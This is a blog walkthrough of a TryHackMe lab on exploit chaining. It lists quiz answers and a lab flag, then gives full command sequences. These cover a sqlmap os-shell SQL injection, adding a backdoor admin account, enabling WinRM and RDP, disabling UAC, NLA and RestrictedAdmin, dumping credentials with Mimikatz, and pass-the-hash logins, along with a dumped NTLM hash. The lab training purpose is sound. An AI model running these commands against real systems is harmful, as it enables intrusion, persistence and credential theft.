TL;DR Walkthrough of the TryHackMe room Weaponizing Vulnerabilities.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
I am continuing to go through SDLC focused TryHackMe rooms as I’m studying for a college class on the topic. TryHackMe is doing a good job as always of making an otherwise boring topic fun and interesting. This room is focused on testing applications for vulnerabilities and how dangerous two vulnerabilities can be. By themselves, in isolation, either SQLi and remote file upload are not good, but not necessarily fatal. Security testing can show the impact of chaining exploits though.
— — Task 1 — -
I have understood the basics and I’m ready to start the room.
No answer needed
— — Task 2 — -
What is the term for an exploit that is used to gain control of a system remotely?
remote exploit
— — Task 3 — -
A vulnerability not patched by the vendor and unknown to most people is called a?
0-day
What is a commonly used term for a demonstration that proves the exploitability of a newly discovered vulnerability?
Proof of Concept
What does a product manufacturer typically release to prevent a known vulnerability from being exploited by adversaries?
Patch
— — Task 4 — -
Can it take days, months, or even years to develop a 0-day exploit? (yea/nay)
Yea
An exploit developed once the vendor has released the patch is called?
n-day
— — Task 5 — -
What is the technique called to string together multiple exploits?
exploit chaining
After initial access to the system, the process for gaining higher access within the system is called?
Privilege Escalation
The step in which the adversary tries to maintain long time access to the system is called?
Persistence
— — Task 6 — -
What is the response when we enter email test@chatai.com’ as user email and password 123 in the login form?
undefined
Execute the command whoami, what is the output you receive?
sqlmap -u “http://10.10.15.253/ai/includes/user_login.php?email=test%40chatai.com&password=123" -p email — os-shell
Just hit Yes to all, then select 4 for PHP. Once sqlmap is done we have a shell that accepts legacy cmd.exe commands.
whoami
nt authority\system
Have you noticed the file flag.txt in the web root directory? What is the flag value?
type flag.txt
THM{010101_PAWNED}
How many files are available in the C:\xampp\htdocs\img folder?
dir img
2
— — Task 7 — -
As a security engineer, is it important to ensure that automated scripts being executed are acquired from legitimate sources? (yea/nay)
Yea
— — Task 8 — -
I have completed the room.
No answer needed
— — Post Exploitation — -
THM didn’t ask us to do this, but here at test.local we are never happy with dodgy access to cmd.exe over a PHP shell. Therefore the first thing we did after running sqlmap:
- added a local admin for Mishky
- enabled winrm
- enabled RDP
- uploaded Mimikatz
- dumped the SAM, mscache, and Credential Manager
While still in that initial shell:
net user Mishky Password123 /add
net localgroup administrators Mishky /add
winrm quickconfig -force
We can now do a real login via WinRM
evil-winrm -i 10.10.15.253 -u Mishky -p Password123
Set-Location C:\xampp\htdocs
Get-Content .\flag.txt
(Get-ChildItem C:\xampp\htdocs\img).Count
#Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 ; Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#disable UAC
Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
#disable RestrictedAdmin Mode, aka allow RDP via PTH
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
#Disable NLA
$TargetMachine = $env:COMPUTERNAME ;
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetMachine -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
We can now RDP
xfreerdp /v:10.10.15.253 /u:Mishky /p:Password123 /dynamic-resolution
copy/paste Invoke-Mimikatz.ps1 to Desktop
. C:\Users\Mishky\Desktop\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::sam" "lsadump::cache" "vault::cred"'
We now have the Administrator’s NTLM.
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 007dad4df1dec3c3120462d45bf29682
— — Persistence — -
That NTLM wasn’t on crackstation, but no matter. We can easily PTH with evil-winrm and xfreerdp. This is handy if the VM shuts down and you forgot to jot down an answer to one or two questions. It happens to me all the time.
evil-winrm -i 10.10.64.197 -u Administrator -H 007dad4df1dec3c3120462d45bf29682
#disable RestrictedAdmin Mode, aka allow RDP via PTH
New-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' -name 'DisableRestrictedAdmin' -PropertyType 'DWORD' -value '0' -force
xfreerdp /v:10.10.64.197 /u:Administrator /pth:007dad4df1dec3c3120462d45bf29682
Summary
I find SDLC about as dull a topic as project management. I have had to memorize enough about the topic to pass CISSP or GSLC in the past, then I mostly forget it a week or two after the exam is thankfully over. Sadly I have to dredge the topic up again for my current college class. At least THM has been helping keep me from going into a coma while going over it.
Normally I’d include a reference section at the bottom, but all I used for this room besides THM’s instructions was our Master AD Cheatsheet.